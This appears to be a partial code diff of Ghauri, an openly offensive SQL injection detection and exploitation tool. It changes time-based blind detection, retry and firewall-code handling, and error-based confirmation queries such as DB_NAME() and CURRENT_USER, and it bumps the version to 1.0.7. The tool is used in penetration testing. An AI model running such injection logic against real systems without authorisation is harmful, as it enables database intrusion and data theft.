     1011 + quest = logger.read_input(
     1012 + "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] ",
     1013 + batch=False,
     1014 + user_input="S",
    1094 1015   )
    1095  - if not ok.vulnerable:
    1096  - logger.warning(
    1097  - "false positive payload detected with read timeout continue testing.."
     1016 + if quest and quest == "n":
     1017 + # later on will handle this nicely..
     1018 + return "next parameter"
     1019 + if quest and quest == "q":
     1020 + logger.error("user quit")
     1021 + logger.end("ending")
     1022 + exit(0)
     1023 + if quest and quest == "e":
     1024 + end_detection_phase = True
     1025 + if quest and quest == "s":
     1026 + break
     1027 + except ConnectionAbortedError as e:
     1028 + logger.critical(
     1029 + f"connection attempt to the target URL was aborted by the peer, Ghauri is going to retry"
     1030 + )
     1031 + retry_on_error += 1
     1032 + except ConnectionRefusedError as e:
     1033 + logger.critical(
     1034 + f"connection attempt to the target URL was refused by the peer. Ghauri is going to retry"
     1035 + )
     1036 + retry_on_error += 1
     1037 + except ConnectionResetError as e:
     1038 + logger.critical(
     1039 + f"connection attempt to the target URL was reset by the peer. Ghauri is going to retry"
     1040 + )
     1041 + retry_on_error += 1
     1042 + except Exception as error:
     1043 + logger.critical(
     1044 + f"error {error}, during detection phase. Ghauri is going to retry"
     1045 + )
     1046 + retry_on_error += 1
     1047 + response_time = attack.response_time
     1048 + if response_time < sleep_time and end_detection_phase:
     1049 + return None
     1050 + requests_counter += 1
     1051 + with_status_code_msg = ""
     1052 + with_status_code = attack.status_code
     1053 + if attack.status_code != base.status_code:
     1054 + is_different_status_code_injectable = True
     1055 + if with_status_code == 4001:
     1056 + with_status_code_msg = (
     1057 + f" (with error ReadTimeout on --timeout={timeout})"
    1098 1058   )
    1099  - continue
    1100  - logger.notice(message)
    1101  - _url = attack.request_url if injection_type == "GET" else attack.url
    1102  - _temp = Response(
    1103  - url=_url,
    1104  - data=attack.data,
    1105  - path=attack.path,
    1106  - title=entry.title,
    1107  - param=parameter,
    1108  - payload=expression,
    1109  - base=base._asdict(),
    1110  - prefix=_payload.prefix,
    1111  - suffix=_payload.suffix,
    1112  - vector=entry.vector,
    1113  - attacks=attack._asdict(),
    1114  - injection_type=injection_type,
    1115  - sleep_time=sleep_time,
    1116  - response_time=response_time,
    1117  - injected=is_injected,
    1118  - prepared_vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
    1119  - number_of_requests=requests_counter,
    1120  - backend=backend,
    1121  - payload_type="time-based blind",
    1122  - payload_raw=_payload,
    1123  - with_status_code=with_status_code,
    1124  - is_different_status_code_injectable=is_different_status_code_injectable,
     1059 + else:
     1060 + with_status_code_msg = f" (with --code={with_status_code})"
     1061 + if attack.status_code in [403, 406] and code and code not in [403, 406]:
     1062 + logger.critical(
     1063 + f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     1064 + )
     1065 + time.sleep(0.5)
     1066 + error_msg = attack.error_msg
     1067 + http_firewall_code_counter += 1
     1068 + continue
     1069 + logger.debug(
     1070 + f"sleep time: {sleep_time}, response time: {response_time}"
    1125 1071   )
    1126  - return _temp
     1072 + if response_time >= sleep_time:
     1073 + is_injected = True
     1074 + _it = injection_type
     1075 + if param_key == "#1*":
     1076 + _it = "URI"
     1077 + if is_multipart:
     1078 + message = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
     1079 + elif is_json:
     1080 + message = f"(custom) {injection_type} parameter '{mc}JSON {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
     1081 + else:
     1082 + message = f"{_it} parameter '{mc}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
     1083 + if with_status_code_msg and "ReadTimeout" in with_status_code_msg:
     1084 + logger.warning(
     1085 + "in case of read timeout performing further tests to confirm if the detected payload is working.."
     1086 + )
     1087 + ok = confirm_timebased_sqli(
     1088 + base,
     1089 + parameter,
     1090 + _payload,
     1091 + sleep_time,
     1092 + response_time,
     1093 + url=url,
     1094 + data=data,
     1095 + headers=headers,
     1096 + injection_type=injection_type,
     1097 + proxy=proxy,
     1098 + is_multipart=is_multipart,
     1099 + timeout=timeout,
     1100 + delay=delay,
     1101 + timesec=timesec,
     1102 + is_read_timedout=True,
     1103 + vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
     1104 + )
     1105 + if not ok.vulnerable:
     1106 + logger.warning(
     1107 + "false positive payload detected with read timeout continue testing.."
     1108 + )
     1109 + continue
     1110 + logger.notice(message)
     1111 + _url = attack.request_url if injection_type == "GET" else attack.url
     1112 + _temp = Response(
     1113 + url=_url,
     1114 + data=attack.data,
     1115 + path=attack.path,
     1116 + title=entry.title,
     1117 + param=parameter,
     1118 + payload=expression,
     1119 + base=base._asdict(),
     1120 + prefix=_payload.prefix,
     1121 + suffix=_payload.suffix,
     1122 + vector=entry.vector,
     1123 + attacks=attack._asdict(),
     1124 + injection_type=injection_type,
     1125 + sleep_time=sleep_time,
     1126 + response_time=response_time,
     1127 + injected=is_injected,
     1128 + prepared_vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
     1129 + number_of_requests=requests_counter,
     1130 + backend=backend,
     1131 + payload_type="time-based blind",
     1132 + payload_raw=_payload,
     1133 + with_status_code=with_status_code,
     1134 + is_different_status_code_injectable=is_different_status_code_injectable,
     1135 + )
     1136 + return _temp
    1127 1137   return None
    1128 1138   
    1129 1139   
    skipped 189 lines
    1319 1329   "confirmating if target is actually exploiable or not.."
    1320 1330   )
    1321 1331   _pv = f"{_payload.prefix}{entry.vector}{_payload.suffix}"
    1322  - _expression = _pv.replace("[INFERENCE]", "(SELECT%20DB_NAME())")
    1323  - logger.payload(f"{urldecode(_expression)}")
    1324  - try:
    1325  - _attack = inject_expression(
    1326  - url=url,
    1327  - data=data,
    1328  - proxy=proxy,
    1329  - delay=delay,
    1330  - timesec=timesec,
    1331  - timeout=timeout,
    1332  - headers=headers,
    1333  - parameter=parameter,
    1334  - expression=_expression,
    1335  - is_multipart=is_multipart,
    1336  - injection_type=injection_type,
    1337  - )
    1338  - retval_confirm = search_regex(
    1339  - pattern=(
    1340  - r"(?isx)(?:(?:r0oth3x49|START)~(?P<error_based_response>.*?)\~END)",
    1341  - REGEX_GENERIC,
    1342  - REGEX_MSSQL_STRING,
    1343  - ),
    1344  - string=_attack.text,
    1345  - group="error_based_response",
    1346  - default=None,
    1347  - )
    1348  - if retval_confirm and retval_confirm != "<blank_value>":
    1349  - is_string = True
    1350  - logger.debug(
    1351  - f"reflective value found in response, filtering out"
     1332 + pl = (
     1333 + "(SELECT DB_NAME())"
     1334 + if backend == "Microsoft SQL Server"
     1335 + else None
     1336 + )
     1337 + if not pl:
     1338 + pl = "CURRENT_USER" if backend == "MySQL" else None
     1339 + if pl:
     1340 + _expression = _pv.replace("[INFERENCE]", pl)
     1341 + logger.payload(f"{urldecode(_expression)}")
     1342 + try:
     1343 + _attack = inject_expression(
     1344 + url=url,
     1345 + data=data,
     1346 + proxy=proxy,
     1347 + delay=delay,
     1348 + timesec=timesec,
     1349 + timeout=timeout,
     1350 + headers=headers,
     1351 + parameter=parameter,
     1352 + expression=_expression,
     1353 + is_multipart=is_multipart,
     1354 + injection_type=injection_type,
    1352 1355   )
    1353  - logger.debug(f"retrieved: '{retval_confirm}'")
    1354  - else:
    1355  - logger.debug(
    1356  - "false positive payload detected, continue testing more.."
     1356 + retval_confirm = search_regex(
     1357 + pattern=(
     1358 + r"(?isx)(?:(?:r0oth3x49|START)~(?P<error_based_response>.*?)\~END)",
     1359 + REGEX_GENERIC,
     1360 + REGEX_MSSQL_STRING,
     1361 + ),
     1362 + string=_attack.text,
     1363 + group="error_based_response",
     1364 + default=None,
     1365 + )
     1366 + if retval_confirm and retval_confirm != "<blank_value>":
     1367 + is_string = True
     1368 + logger.debug(
     1369 + f"reflective value found in response, filtering out"
     1370 + )
     1371 + logger.debug(f"retrieved: '{retval_confirm}'")
     1372 + else:
     1373 + logger.debug(
     1374 + "false positive payload detected, continue testing more.."
     1375 + )
     1376 + continue
     1377 + except KeyboardInterrupt:
     1378 + logger.warning(
     1379 + "user aborted during string error-based 'Microsoft SQL Server' injection confirmation"
     1380 + )
     1381 + continue
     1382 + except Exception as error:
     1383 + logger.critical(
     1384 + f"error {error}, during string error-based 'Microsoft SQL Server' injection confirmation.."
    1357 1385   )
    1358 1386   continue
    1359  - except KeyboardInterrupt:
    1360  - logger.warning(
    1361  - "user aborted during string error-based 'Microsoft SQL Server' injection confirmation"
    1362  - )
    1363  - continue
    1364  - except Exception as error:
    1365  - logger.critical(
    1366  - f"error {error}, during string error-based 'Microsoft SQL Server' injection confirmation.."
    1367  - )
    1368  - continue
    1369 1387   _it = injection_type
    1370 1388   if param_key == "#1*":
    1371 1389   _it = "URI"
    skipped 202 lines
    1574 1592   string = "r0oth3x49"
    1575 1593   regex = r"(?is)(?:r0oth3x49)"
    1576 1594   if backend == "Microsoft SQL Server":
     1595 + if "string error-based" in title:
     1596 + to_str = is_string = True
     1597 + if is_string:
     1598 + string = "r0ot"
     1599 + regex = r"(?is)(?:r0ot)"
     1600 + else:
     1601 + to_char = not is_string
     1602 + if backend == "MySQL":
    1577 1603   if "string error-based" in title:
    1578 1604   to_str = is_string = True
    1579 1605   if is_string:
    skipped 667 lines
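--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@
 
 setup(
  name="ghauri",
- version="1.0.6",
+ version="1.0.7",
  description="An advanced SQL injection detection & exploitation tool.",
  classifiers=["Programming Language :: Python3"],
  author="Nasir Khan",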